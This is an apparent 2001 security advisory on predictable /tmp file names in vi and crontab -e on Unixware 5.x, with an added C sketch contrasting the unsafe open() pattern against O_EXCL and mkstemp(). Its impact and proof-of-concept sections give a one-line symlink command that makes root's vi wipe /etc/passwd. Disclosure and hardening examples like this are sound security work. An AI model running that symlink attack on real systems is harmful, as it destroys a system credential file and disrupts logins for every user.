======================================================================
Strategic Reconnaissance Team Security Advisory (SRT2001-9)
Topic: vi and crontab -e /tmp issues
Vendor: Santa Cruz Operations
Release Date: 05/07/01
======================================================================
.: Description
vi makes poor use of /tmp. The names of the temporary files it creates
there are very predictable.

.: Impact
As a user, run ln -s /etc/passwd /tmp/Ex04161 and wait for root to run vi.
Voilà: when he does, he will clobber /etc/passwd with a null file.

.: Workaround
Don't use vi or crontab -e.
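
Added example (not part of the original advisory and not vi's own code): a C sketch contrasting the open() pattern described above with exclusive creation and mkstemp(). The function names, the scratch directory and the stand-in target file are constructed for illustration; only the name Ex04161 comes from the advisory.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the advisory describes: a guessable name opened with O_CREAT|O_TRUNC.
 * open() follows a symlink already at that path and empties its target. */
int open_predictable(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: with O_CREAT|O_EXCL, open() fails with errno EEXIST if anything,
 * a symlink included, already exists at the path. The link is not followed. */
int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Preferred: mkstemp() picks an unpredictable suffix and creates exclusively. */
int open_scratch(const char *dir, char *out, size_t n) {
    snprintf(out, n, "%s/ExXXXXXX", dir);
    return mkstemp(out);
}

/* Size of the file at path, or -1 if it cannot be stat()ed. */
long file_size(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Constructed fixture: private dir, 5-byte stand-in target, symlink to it. */
int setup_demo(char *dir, char *target, char *lnk, size_t n) {
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, n, "%s/target", dir);
    snprintf(lnk, n, "%s/Ex04161", dir);
    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "data\n", 5) != 5) return -1;
    close(fd);
    return symlink(target, lnk);
}

int main(void) {
    char dir[] = "/tmp/srt-demo-XXXXXX", target[128], lnk[128], tmp[128];
    if (setup_demo(dir, target, lnk, sizeof target) != 0) return 1;
    printf("O_EXCL fd=%d, target=%ld bytes\n", open_exclusive(lnk), file_size(target));
    printf("mkstemp fd=%d at %s\n", open_scratch(dir, tmp, sizeof tmp), tmp);
    return 0;
}
```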

.: Systems Affected
Unixware 5.x

.: Proof of Concept
ln -s /etc/passwd /tmp/Ex04161

.: Vendor Status
A copy of this advisory was mailed to their attention.

.: Credit
Kevin Finisterre
[EMAIL PROTECTED]

======================================================================
© Copyright 2001 Secure Network Operations, Inc. All Rights Reserved.
Strategic Reconnaissance Team | [EMAIL PROTECTED]
http://recon.snosoft.com      | http://www.snosoft.com
----------------------------------------------------------------------










